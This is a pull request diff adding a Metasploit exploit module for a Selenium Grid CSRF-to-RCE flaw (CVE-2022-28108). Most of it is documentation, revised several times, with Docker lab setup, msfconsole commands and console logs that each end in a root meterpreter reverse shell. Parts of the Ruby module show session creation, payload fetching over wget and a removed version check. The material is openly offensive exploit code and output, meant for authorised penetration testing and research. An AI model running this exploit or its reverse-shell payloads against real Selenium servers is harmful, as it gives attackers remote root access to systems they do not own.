### PR TITLE
Add Selenium Firefox RCE module (CVE-2022-28108)

### DIFF
--- a/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
+++ b/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
@@ -2,6 +2,7 @@
 
 Selenium Server (Grid) before 4.7 allows CSRF because it permits non-JSON content types
 such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
+The number of sessions must be fewer than maxSessions for the exploit to succeed.
 
 The vulnerability affects:
 

--- a/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
+++ b/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
@@ -1,0 +1,92 @@
+## Vulnerable Application
+
+Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types
+such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
+
+The vulnerability affects:
+
+    * Selenium Server (Grid) before 4
+
+This module was successfully tested on:
+
+    * selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 20.0.4
+
+
+### Installation
+
+1. `docker pull selenium/standalone-firefox:3.141.59`
+
+2. `docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-firefox:3.141.59`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > options
+
+Module options (exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    4444             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      ysvWeotTGNTE     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST                                yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4445
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Version 3.141.59 detected, which is vulnerable
+[+] The target appears to be vulnerable.
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:34690) at 2024-12-28 12:17:05 +0900
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.3
+OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```

--- a/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
+++ b/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
@@ -5,11 +5,12 @@ such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
 
 The vulnerability affects:
 
-    * Selenium Server (Grid) before 4
+    * Selenium Server (Grid) before 4.0.0-alpha-7
 
 This module was successfully tested on:
 
     * selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 20.0.4
+    * selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 20.0.4
 
 
 ### Installation

--- a/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
+++ b/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
@@ -30,6 +30,10 @@ This module was successfully tested on:
 
 
 ## Options
+### TIMEOUT (required)
+
+This is the amount of time (in seconds) that the module will wait for the payload to be
+executed. Defaults to 75 seconds.
 
 
 ## Scenarios
@@ -47,6 +51,7 @@ Module options (exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108):
    RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
    RPORT    4444             yes       The target port (TCP)
    SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   TIMEOUT  75               yes       Timeout for exploit (seconds)
    VHOST                     no        HTTP server virtual host
 
 
@@ -56,7 +61,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
    ----                ---------------  --------  -----------
    FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
    FETCH_DELETE        true             yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      STduFkVLXVH      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_FILENAME      UalQFVpkykxR     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_SRVHOST                        no        Local IP to use for serving payload
    FETCH_SRVPORT       8080             yes       Local port to use for serving payload
    FETCH_URIPATH                        no        Local URI to use for serving payload
@@ -79,7 +84,7 @@ msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=1
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:58392) at 2024-12-29 12:27:12 +0900
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:38584) at 2024-12-29 12:52:46 +0900
 
 meterpreter > getuid
 Server username: root
@@ -98,7 +103,7 @@ msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=1
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
-[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:59150) at 2024-12-29 12:31:50 +0900
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:36752) at 2024-12-29 12:59:06 +0900
 
 meterpreter > getuid
 Server username: root

--- a/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
+++ b/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
@@ -1,18 +1,20 @@
 ## Vulnerable Application
 
-Selenium Server (Grid) before 4.7 allows CSRF because it permits non-JSON content types
+Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)
+allows CSRF because it permits non-JSON content types
 such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
-The number of sessions must be fewer than maxSessions for the exploit to succeed.
+At least, the number of sessions must be fewer than maxSessions for the exploit to succeed.
 
 The vulnerability affects:
 
-    * Selenium Server (Grid) before 4.7
+    * Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)
 
 This module was successfully tested on:
 
     * selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
     * selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
     * selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
 
 
 ### Installation
@@ -131,6 +133,25 @@ Server username: root
 meterpreter > sysinfo
 Computer     : 172.17.0.2
 OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
+```
+msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4449
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:60066) at 2025-01-02 09:29:36 +0900
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Ubuntu 24.04 (Linux 6.8.0-51-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux

--- a/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
+++ b/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types
+Selenium Server (Grid) before 4.0.0-alpha-7 allows CSRF because it permits non-JSON content types
 such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
 
 The vulnerability affects:
@@ -9,8 +9,8 @@ The vulnerability affects:
 
 This module was successfully tested on:
 
-    * selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 20.0.4
-    * selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 20.0.4
+    * selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
 
 
 ### Installation
@@ -33,6 +33,7 @@ This module was successfully tested on:
 
 
 ## Scenarios
+### selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
 ```
 msf6 > use exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108
 [*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
@@ -55,7 +56,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
    ----                ---------------  --------  -----------
    FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
    FETCH_DELETE        false            yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      ysvWeotTGNTE     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_FILENAME      vryeXadl         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_SRVHOST                        no        Local IP to use for serving payload
    FETCH_SRVPORT       8080             yes       Local port to use for serving payload
    FETCH_URIPATH                        no        Local URI to use for serving payload
@@ -74,18 +75,38 @@ Exploit target:
 
 View the full module info with the info, or info -d command.
 
-msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4445
+msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4445 ForceExploit=true
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Version 3.141.59 detected, which is vulnerable
-[+] The target appears to be vulnerable.
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:34690) at 2024-12-28 12:17:05 +0900
+[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable
+[+] Deleted /GsDqXNZBxmLv
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:44250) at 2024-12-29 11:53:58 +0900
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
+```
+msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4446 ForceExploit=true
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
+[+] Deleted /poYThRAaVWqQ
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:59596) at 2024-12-29 11:56:25 +0900
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
 Computer     : 172.17.0.3
-OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
+OS           : Ubuntu 18.04 (Linux 6.8.0-51-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux

--- a/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
+++ b/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
@@ -55,8 +55,8 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
    Name                Current Setting  Required  Description
    ----                ---------------  --------  -----------
    FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
-   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      vryeXadl         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      STduFkVLXVH      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_SRVHOST                        no        Local IP to use for serving payload
    FETCH_SRVPORT       8080             yes       Local port to use for serving payload
    FETCH_URIPATH                        no        Local URI to use for serving payload
@@ -79,8 +79,7 @@ msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=1
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable
-[+] Deleted /GsDqXNZBxmLv
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:44250) at 2024-12-29 11:53:58 +0900
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:58392) at 2024-12-29 12:27:12 +0900
 
 meterpreter > getuid
 Server username: root
@@ -99,8 +98,7 @@ msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=1
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
-[+] Deleted /poYThRAaVWqQ
-[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:59596) at 2024-12-29 11:56:25 +0900
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:59150) at 2024-12-29 12:31:50 +0900
 
 meterpreter > getuid
 Server username: root

--- a/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
+++ b/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
@@ -1,16 +1,17 @@
 ## Vulnerable Application
 
-Selenium Server (Grid) before 4.0.0-alpha-7 allows CSRF because it permits non-JSON content types
+Selenium Server (Grid) before 4.7 allows CSRF because it permits non-JSON content types
 such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
 
 The vulnerability affects:
 
-    * Selenium Server (Grid) before 4.0.0-alpha-7
+    * Selenium Server (Grid) before 4.7
 
 This module was successfully tested on:
 
     * selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
     * selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
 
 
 ### Installation
@@ -61,7 +62,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
    ----                ---------------  --------  -----------
    FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
    FETCH_DELETE        true             yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      UalQFVpkykxR     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_FILENAME      QqkwqZES         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_SRVHOST                        no        Local IP to use for serving payload
    FETCH_SRVPORT       8080             yes       Local port to use for serving payload
    FETCH_URIPATH                        no        Local URI to use for serving payload
@@ -80,16 +81,16 @@ Exploit target:
 
 View the full module info with the info, or info -d command.
 
-msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4445 ForceExploit=true
+msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4445
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:38584) at 2024-12-29 12:52:46 +0900
+[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:47990) at 2024-12-30 12:46:43 +0900
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : 172.17.0.2
+Computer     : 172.17.0.3
 OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
@@ -99,17 +100,36 @@ meterpreter >
 
 ### selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
 ```
-msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4446 ForceExploit=true
+msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4446
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
-[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:36752) at 2024-12-29 12:59:06 +0900
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:33048) at 2024-12-30 12:48:53 +0900
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : 172.17.0.3
+Computer     : 172.17.0.4
 OS           : Ubuntu 18.04 (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
+```
+msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4448
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.16:43864) at 2024-12-30 12:58:33 +0900
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux

--- a/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
+++ b/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
@@ -65,7 +65,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
    ----                ---------------  --------  -----------
    FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
    FETCH_DELETE        true             yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      QqkwqZES         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_FILENAME      NnnZmAGfjJoa     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_SRVHOST                        no        Local IP to use for serving payload
    FETCH_SRVPORT       8080             yes       Local port to use for serving payload
    FETCH_URIPATH                        no        Local URI to use for serving payload
@@ -88,12 +88,14 @@ msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=1
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:47990) at 2024-12-30 12:46:43 +0900
+[*] Started session (3191e005-977b-40c9-8c70-7e2f4ef4f922).
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:43182) at 2025-01-04 10:01:09 +0900
+[*] Failed to delete the session (3191e005-977b-40c9-8c70-7e2f4ef4f922). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : 172.17.0.3
+Computer     : 172.17.0.2
 OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
@@ -107,12 +109,14 @@ msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=1
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
-[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:33048) at 2024-12-30 12:48:53 +0900
+[*] Started session (dc849fa9-0b61-4862-8766-21f1cb47c827).
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:54410) at 2025-01-04 10:03:37 +0900
+[*] Failed to delete the session (dc849fa9-0b61-4862-8766-21f1cb47c827). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : 172.17.0.4
+Computer     : 172.17.0.3
 OS           : Ubuntu 18.04 (Linux 6.8.0-51-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
@@ -122,16 +126,18 @@ meterpreter >
 
 ### selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
 ```
-msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4448
+msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
-[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.16:43864) at 2024-12-30 12:58:33 +0900
+[*] Started session (af8d64bc-cdf6-4a03-8706-e90bddbee1c2).
+[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.16:40680) at 2025-01-04 10:05:44 +0900
+[*] Failed to delete the session (af8d64bc-cdf6-4a03-8706-e90bddbee1c2). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : 172.17.0.2
+Computer     : 172.17.0.4
 OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
@@ -141,16 +147,18 @@ meterpreter >
 
 ### selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
 ```
-msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4449
+msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4448
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:60066) at 2025-01-02 09:29:36 +0900
+[*] Started session (1657b5ac-c514-431f-8c83-761c14012869).
+[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.16:44868) at 2025-01-04 10:10:38 +0900
+[*] Failed to delete the session (1657b5ac-c514-431f-8c83-761c14012869). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : 172.17.0.2
+Computer     : 172.17.0.5
 OS           : Ubuntu 24.04 (Linux 6.8.0-51-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::FileDropper
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -45,6 +44,9 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ],
         ],
+        'DefaultOptions' => {
+          'FETCH_DELETE' => true
+        },
         'DefaultTarget' => 0,
         'DisclosureDate' => '2022-04-18',
         'Notes' => {
@@ -123,8 +125,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     session_id = res.get_json_document['value']['sessionId'] || res.get_json_document['sessionId']
     fail_with(Failure::Unreachable, 'Failed to start session') unless session_id
-
-    register_files_for_cleanup("/#{datastore['FETCH_FILENAME']}")
 
     b64encoded_payload = Rex::Text.encode_base64(
       "rm -rf $0\n"\

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -37,7 +37,6 @@ class MetasploitModule < Msf::Exploit::Remote
             'Linux Command', {
               'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
                 'FETCH_COMMAND' => 'WGET'
               }
             }
@@ -99,6 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Extract the version
     version = Rex::Version.new(json_data['version'])
     @version3 = version < Rex::Version.new('4.0.0')
+
     CheckCode::Appears("Version #{version} detected, which is vulnerable.")
   end
 

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -98,12 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Extract the version
     version = Rex::Version.new(json_data['version'])
-    if version == Rex::Version.new('4.0.0-alpha-7') || Rex::Version.new('4.0.1') <= version
-      return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.")
-    end
-
     @version3 = version < Rex::Version.new('4.0.0')
-
     CheckCode::Appears("Version #{version} detected, which is vulnerable.")
   end
 

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -59,6 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(4444),
+        OptInt.new('TIMEOUT', [ true, 'Timeout for exploit (seconds)', 75 ])
       ]
     )
   end
@@ -120,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'wd/hub/session'),
       'headers' => { 'Content-Type' => 'application/json; charset=utf-8' },
       'data' => new_session
-    }, 75)
+    }, datastore['TIMEOUT'])
     fail_with(Failure::Unreachable, 'Connection failed') unless res
 
     session_id = res.get_json_document['value']['sessionId'] || res.get_json_document['sessionId']

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -1,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'net/http'
+require 'uri'
+require 'json'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Selenium geckodriver RCE',
+        'Description' => %q{
+          Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types
+          such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
+        },
